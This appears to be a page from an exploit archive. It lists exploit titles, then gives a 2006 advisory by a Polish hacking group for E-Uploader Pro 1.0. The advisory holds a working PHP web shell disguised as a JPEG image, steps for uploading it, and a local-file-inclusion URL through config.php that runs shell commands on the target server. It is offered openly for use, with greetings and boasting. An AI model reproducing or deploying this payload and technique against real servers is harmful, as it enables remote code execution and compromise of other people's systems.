
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
88 lines
2.5 KiB
Text
Executable file
88 lines
2.5 KiB
Text
Executable file
::::::::: :::::::::: ::: ::: ::::::::::: :::
|
|
:+: :+: :+: :+: :+: :+: :+:
|
|
+:+ +:+ +:+ +:+ +:+ +:+ +:+
|
|
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
|
|
+#+ +#+ +#+ +#+ +#+ +#+ +#+
|
|
#+# #+# #+# #+#+#+# #+# #+#
|
|
######### ########## ### ########### ##########
|
|
::::::::::: :::::::::: ::: :::: ::::
|
|
:+: :+: :+: :+: +:+:+: :+:+:+
|
|
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
|
|
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
|
|
+#+ +#+ +#+ +#+ +#+ +#+
|
|
#+# #+# #+# #+# #+# #+#
|
|
### ########## ### ### ### ###
|
|
|
|
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- E-Uploader Pro <= 1.0 Remote Code Execution Vulnerabilities
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- [Script name: E-Uploader Pro 1.0
|
|
- [Script site: http://www.scriptsfrenzy.com/euploader.html
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Find by: Kacper (a.k.a Rahim)
|
|
+
|
|
- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
|
|
+
|
|
- Contact: kacper1964@yahoo.pl
|
|
- or
|
|
- http://www.rahim.webd.pl/
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Special Greetz: DragonHeart ;-)
|
|
- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
|
|
- SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios, SpiderZ
|
|
-
|
|
- Greetz for all users DEVIL TEAM IRC Channel !!
|
|
!@ Przyjazni nie da sie zamienic na marne korzysci @!
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Z Dedykacja dla osoby,
|
|
- bez ktorej nie mogl bym zyc...
|
|
- K.C:* J.M (a.k.a Magaja)
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
devilteam.jpg source: <?php ob_clean();echo"Hacker_Kacper_Made_in_Poland:)";ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>
|
|
|
|
Name:*: devilteam
|
|
Email:* devilteam@hackers.pl
|
|
File:* upload evil devilteam.jpg ;]
|
|
|
|
Click: Upload
|
|
|
|
then....
|
|
|
|
[devilteam.jpg] uploaded
|
|
|
|
|
|
Your upload has been successful!
|
|
|
|
|
|
....
|
|
|
|
Uploader Name
|
|
devilteam639
|
|
|
|
Now insert:
|
|
|
|
http://strona.pl/uploader/include/config.php?language=../../root/devilteam639/devilteam.jpg?cmd=ls -la
|
|
|
|
echo Hacker_Kacper_Made_in_Poland:)
|
|
|
|
E-Uploader Pro Game Over ;]
|
|
|
|
DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
|
|
|
|
# milw0rm.com [2006-10-14]
|